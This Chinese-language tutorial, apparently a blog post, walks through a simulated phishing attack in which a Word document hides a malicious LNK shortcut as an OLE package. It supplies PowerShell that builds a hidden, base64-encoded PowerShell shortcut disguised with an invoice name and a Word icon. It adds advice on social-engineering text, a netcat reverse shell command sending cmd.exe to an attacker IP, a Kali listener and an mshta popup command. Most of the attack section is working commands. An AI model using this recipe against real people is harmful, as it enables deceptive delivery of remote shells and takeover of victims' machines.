通過Windows的office，可以實施許多釣魚攻擊，這里對其中的OLE+LNK，進行一個模擬釣魚攻擊，直接反彈shell。
實現(xiàn)的效果如下：

釣魚效果

環(huán)境

本文使用的環(huán)境和工具如下（可選擇其他版本的系統(tǒng)和office）：

• Netcat for Windows，即nc.exe

攻擊機1（用于制造釣魚文件）：

• Windows 10
• Microsoft Office Word 2016

攻擊機2：

• kali

靶機：

• Windows 10
• Microsoft Office Word 2016（不一定需要和攻擊機一致）

相關(guān)知識

• 釣魚攻擊：釣魚式攻擊是指企圖從電子通訊中，通過偽裝成信譽卓著的法人媒體以獲得如用戶名、密碼和信用卡明細等個人敏感信息的犯罪詐騙過程。
• OLE：Object Linking and Embedding，對象連接與嵌入，簡稱OLE技術(shù)。OLE 不僅是桌面應(yīng)用程序集成，而且還定義和實現(xiàn)了一種允許應(yīng)用程序作為軟件“對象”（數(shù)據(jù)集合和操作數(shù)據(jù)的函數(shù)）彼此進行“連接”的機制，這種連接機制和協(xié)議稱為組件對象模型（COM）。OLE可以用來創(chuàng)建復(fù)合文檔，復(fù)合文檔包含了創(chuàng)建于不同源應(yīng)用程序，有著不同類型的數(shù)據(jù)，因此它可以把文字、聲音、圖像、表格、應(yīng)用程序等組合在一起。
• LNK：lnk文件是用于指向其他文件的一種文件。 這些文件通常稱為快捷方式文件，通常它以快捷方式放在硬盤上，以方便使用者快速的調(diào)用。
• 惡意LNK文件：快捷方式（LNK）是一種引用其他文件或程序的通用方法，在系統(tǒng)啟動或用戶單擊它時，就會打開或執(zhí)行其他文件。攻擊者可以通過快捷方式部署他們的持久性攻擊工具。他們可能會創(chuàng)建一個新的快捷方式關(guān)聯(lián)到某個惡意軟件，同時把它偽裝成一個合法的程序?；蛘吖粽咭部梢跃庉嬕汛嬖诳旖莘绞降哪繕?biāo)路徑，這樣受害者就會在不知不覺中運行惡意軟件。

釣魚文件準(zhǔn)備

以管理員身份運行powershell，執(zhí)行以下命令：

$command = 'Start-Process c:\shell.cmd'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)

$obj = New-object -comobject wscript.shell
$link = $obj.createshortcut("c:\Invoice-FinTech-0900541.lnk")
$link.windowstyle = "10"
$link.targetpath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$link.iconlocation = "C:\Program Files\Windows NT\Accessories\wordpad.exe"
$link.arguments = "-Nop -sta -noni -w hidden -encodedCommand "+$encodedCommand
$link.save()

沒報錯就是執(zhí)行成功了：

命令執(zhí)行成功

依次點擊插入->對象->對象：

插入對象

選擇package，勾選顯示為圖標(biāo)，點擊更改圖標(biāo)：

更改圖標(biāo)

在彈出來的對話框中點擊瀏覽，找到word的安裝目錄，選擇WINWORD.EXE：

選擇word

點擊打開之后，可以看到原對話框樣式已經(jīng)改變，圖標(biāo)選擇第二個，題注這里用的之前創(chuàng)建的lnk文件的名字Invoice-FinTech-0900541，然后點擊確定：

image.png

選擇剛剛腳本創(chuàng)建的文件：

選擇文件

插入之后：

插入之后

適當(dāng)加一點社工文字：

社工一下

然后保存，發(fā)給靶機，任意目錄均可

下載Netcat for Windows，解壓，移動到靶機上，記住其存放地址

新建一個TXT文件，寫入內(nèi)容：

C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe

其中，C:\tools\nc.exe為剛剛記住的nc的存放路徑，10.0.0.5為反彈shell的攻擊機ip

重命名該文件為shell.cmd，然后移動到靶機的C盤根目錄下

攻擊實施

打開攻擊機2，也就是kali，輸入命令回車：

nc -lvnp 443

可以看到，監(jiān)聽已經(jīng)建立：

監(jiān)聽建立

受害者在靶機打開文件，雙擊了圖標(biāo)，彈窗：

彈窗

選擇打開，可以看到喚起了我們創(chuàng)建的惡意的cmd程序：

喚起惡意程序

可以看到，攻擊機已經(jīng)建立了shell連接，可以執(zhí)行任意命令，反彈shell成功：

反彈shell成功

本文開頭的圖片中的彈窗命令如下：

mshta vbscript("You are hacked!",48,"Hacker")(window.close)

參考鏈接

• Phishing: OLE + LNK